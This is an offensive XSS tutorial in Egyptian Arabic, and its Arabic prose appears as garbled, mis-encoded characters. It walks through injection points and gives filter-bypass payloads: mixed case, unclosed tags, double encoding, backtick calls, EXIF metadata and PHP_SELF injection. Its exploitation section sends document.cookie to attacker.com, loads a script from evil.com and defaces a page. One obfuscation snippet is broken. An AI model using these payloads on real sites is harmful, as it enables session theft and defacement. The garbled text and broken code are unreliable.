

# ุฃูู ุญุงุฌุฉ: ูุนูู ุฅูู XSS ุฃุตูุงูุ

XSS = Cross Site Scripting
ูุฏู ูุงุญุฏุฉ ูู ุฃุฎุทุฑ ุซุบุฑุงุช ุงูููุจ ูุจุชุดุชุบู ูุฏู:

1. ููู ููุฑู ุฃู input ุฃู ูููู ูู ุงููููุน ุจูุงุฎุฏ ููู ุจูุงูุงุช.
2. ุงูุณูุฑูุฑ ุจูุงุฎุฏ ุงูุจูุงูุงุช ุฏู ููุญุทูุง ูู ุงูุตูุญุฉ ูู ุบูุฑ ูุง ููุถููุง ุฃู ูุนูููุง.
3. ุฅูุช ุจุฏู ูุง ุชุจุนุชูู ุจูุงูุงุช ุนุงุฏูุฉุ ุชุญูููู ููุฏ ุฌุงูุงุณูุฑูุจุช.
4. ุงูููุฏ ุฏู ูุชููุฐ ูู ูุชุตูุญ ุงูุถุญูุฉ ููุง ููุชุญ ุงูุตูุญุฉ.

---

## ูุซุงู ุจุณูุท ุฌุฏุง:

ููู ููุฑู ุจููููู:

> ุงุณูู ุงููุ ๐ค

ูุงูุช ุฏุฎูุช:
`Saif`

ุงููุชูุฌุฉ:

```html
ูุฑุญุจุงู Saif
```
---------------------------------------

ูู ุฏุฎูุชูู:

```html
<script>alert('XSS!')</script>
```

ุงููุชูุฌุฉ:

```html
ูุฑุญุจุงู <script>alert('XSS!')</script>
```
------------------------------------------
!!!ุนูุฏ ุงูุถุญูู Alert ููุดุชุบู ุงูุฌุงูุงุณูุฑูุจุช ููุชูุชุญ ---

# ุทูุจ ุจุชููุฏู ูู ุฅููุ

ูู ูุนุงู XSS ูู ูููุน ุชูุฏุฑ ุชุนูู ุงูุขุชู:

* ุชุณุฑู ุงูููููุฒ ุจุชุงุนุฉ ุงูุถุญูุฉ.
* ุชุณุฑู ุงูู session ุจุชุงุนู.
* ุชุนูู defacement ูููููุน.
* ุชุดุบู ุฃู ููุฏ ูู ูุชุตูุญ ุงูุถุญูุฉ.

---

# ุทูุจ ุฃููุงุน XSS ุฅููุ ๐ค

ููู 3 ุฃููุงุน ุฃุณุงุณููู:

| ุงูููุน         | ูุนูุงู                                                                |
| ------------- | -------------------------------------------------------------------- |
| Reflected XSS | ุงูููุฏ ุจูุชููุฐ ุฃูู ูุง ุชุจุนุช ุงูุฑูููุณุช                                    |
| Stored XSS    | ุงูููุฏ ุจูุชุฎุฒู ูู ุงูุณูุฑูุฑ (ูู ููููุช ูุซูุง) ููุชููุฐ ููุง ุฃู ุญุฏ ูุดูู ุงูุตูุญุฉ |
| DOM-Based XSS | ุงูููุฏ ุจูุชููุฐ ุจุณุจุจ ุฎุทุฃ ูู ุฌุงูุงุณูุฑูุจุช ุงูุนููู (ุงููุชุตูุญ)                 |

---

# ูุฏุฎู ุนูู ุงูุชููู ุจูู ๐ฅ

## ุฃูู ููุน: HTML Injection (ุงููู ูู ุจุณูุท ุดููุฉ)

ูู ุงูุณูุฑูุฑ ุจูุงุฎุฏ ุงูููุงู ุจุชุงุนู ูุจูุญุทู ุฌูุงู HTML.

ูุซุงู:

ูู ุงูู input ุจููุฒู ูุฏู:

```html
<p>ุงููุง ุจูู: [INPUT]</p>
```

ูู ุฏุฎูุชูู:

```html
<script>alert(1)</script>
```

ูุชุจูู:

```html
<p>ุงููุง ุจูู: <script>alert(1)</script></p>
```

ููุชูุชุญ ุงูู alert.

---

## ุซุงูู ููุน: Attribute Injection

ูู ูุฏุฎูู ุจูุฑูุญ ุฌูุง Attribute ุฒู:

```html
<img src="[INPUT]">
```

ูู ุฏุฎูุช:

```html
x" onerror="alert(1)
```

ููุทูุน:

```html
<img src="x" onerror="alert(1)">
```

ูุฃูู ูุง ุงููููู ููุจูุงุด ุดุบุงู ูุญุตู alert.

---

## ุซุงูุซ ููุน: SVG Payload

SVG ุจูุดุชุบู ูู ูุนุธู ุงููุชุตูุญุงุช ูุจูุจูู ูุฏู:

```html
<svg onload=alert(1)>
```

ูู ูููุน ุญุงุทุท ุงูู input ูู ุฃู ุญุชุฉ HTML ูููู ุชุญูู ุงูููุฏ ุฏู.

---

## ุฑุงุจุน ููุน: Inline Event Handlers

ููุง ุชููู ุจุชุญูู ุฏุงุฎู ุฎุงุตูุฉ ูู ุฎุตุงุฆุต ุงูู HTML ุฒู:

```html
<a href="#" onclick="[INPUT]">ุงุถุบุท ููุง</a>
```

ูู ุฏุฎูุช:

```javascript
alert(1)
```

ููุชููุฐ ุฃูู ูุง ูุถุบุท ุงูุถุญูุฉ.

---

# ุทูุจ ูู ูู ููุชุฑุ ๐ค

ููุง ุจูู ุจูุฌู ุดุบู ุงูู **Bypass Techniques**

---

## 1๏ธโฃ Mixed Case (ุชุบููุฑ ุงูุญุฑูู)

```html
<SvG OnLoAd=alert(1)>
```

---

## 2๏ธโฃ Unclosed Tags (ูุชูููุด ุงูุชุงุฌ)

```html
<svg onload=alert(1)//
```

---

## 3๏ธโฃ Double Encoding

ูุนูู ุชุจุนุช ุงูููุฏ ูุดูุฑ ูุฐุง ูุฑุฉ.

```html
%253Csvg%2520onload%253Dalert%25281%2529%253E
```

---

## 4๏ธโฃ ุจุฏูู ุฃููุงุณ

ูู ุงููููุน ูุงูุน ุงูุฃููุงุณ:

```javascript
alert`1`
```

ููุณ ูุชูุฌุฉ `alert(1)`

---

## 5๏ธโฃ Obfuscation (ุชูุนุจ ุนูู ุงูููุงุชุฑ)

ุชูุชุจ ุงูููุฏ ุจุดูู ุบุฑูุจ ููุนุฏูุด ุนูู ุงูููุชุฑ:

```javascript
top 
top 
```

---

# ุญุงุฌุงุช ูุชูุฏูุฉ ุจูู ๐

## File Upload XSS

ูู ุงููููุน ุจูุณูุญูู ุชุฑูุน ุตูุฑุฉ ุฃู ูููุ ูุชุญุท ุงูุจุงูููุฏ ูู ุงูููุชุงุฏุงุชุง ุจุชุงุน ุงูููู:

```bash
exiftool -Artist='"><svg onload=alert(1)>' xss.jpg
```

ูููุง ุญุฏ ููุชุญ ุงูุตูุฑุฉ ูุชููุฐ ุงูููุฏ.

---

## DOM-Based XSS

ููุง ุงูุฌุงูุงุณูุฑูุจุช ูู ุงูุตูุญุฉ ูู ุงููู ูุญูู ุงูููุฏ:

```javascript
<img src=1 onerror=alert(1)>
```

---

## PHP\_SELF Injection

ูู ุงููููุน ุจูุณุชุฎุฏู ุงุณู ุงูุตูุญุฉ ููุณู ูุฏู ุจูุชุญูู:

```bash
/page.php/"><svg onload=alert(1)>?test=123
```

---

# ุงุณุชุบูุงู ูุชูุฏู (Exploitation)

## ุณุฑูุฉ ุงูููููุฒ:

```javascript
fetch('https://attacker.com/?cookie='+document.cookie)
```

---

## ุญูู ููุฏ ุนู ุจุนุฏ:

```javascript
with(document)body.appendChild(createElement('script')).src='//evil.com/x.js'
```

---

## ุชุดููู ุงููููุน:

```javascript
<svg onload="document.body.innerHTML='<h1>ูููุด ุญุงุฌุฉ ููุง</h1>'">
```

---

# ุฌุฏุงูู ุงูู Encoding

ูู ุงููููุน ุจูุญุงูู ูููุนู ุนู ุทุฑูู ุงูุชุฑููุฒุ ุชูุฏุฑ ุชุจุนุช ุงูุญุฑูู ูุดูุฑุฉ:

| ุงูุญุฑู | HTML Entity       |
| ----- | ----------------- |
| `<`   | `&lt;` ุฃู `%3C`   |
| `>`   | `&gt;` ุฃู `%3E`   |
| `"`   | `&quot;` ุฃู `%22` |
| `'`   | `&#39;` ุฃู `%27`  |

---

# ูุตูุญุฉ ุฃุฎูุฑุฉ:

> ูู ูููุน ูููู ุธุฑูููุ ูุนูู ูู ูุฑุฉ ุจุชูุนุจ ูููุง ูุงุฒู ุชุฌุฑุจ ุฃูุชุฑ ูู ุทุฑููุฉ ูุญุฏ ูุง ุชูุตู ููุจุงู ููุฏ ุงููู ูุนุฏู ูู ุงูููุงุชุฑ.

---

# ๐ ููุฎุต ุณุฑูุน

* XSS = ุญูู ุฌุงูุงุณูุฑูุจุช
* ุฃููุงุนูุง: Reflected - Stored - DOM
* ููู ุจุชุญููุ (HTML - Attribute - Javascript - DOM)
* ุงุฒุงู ุชุชุฎุทู ุงูููุงุชุฑุ Mixed Case, Encoding, Unclosed Tags, Obfuscation
* ุงูุงุณุชุบูุงู: Cookie Stealing - Defacement - Remote Code Execution

---
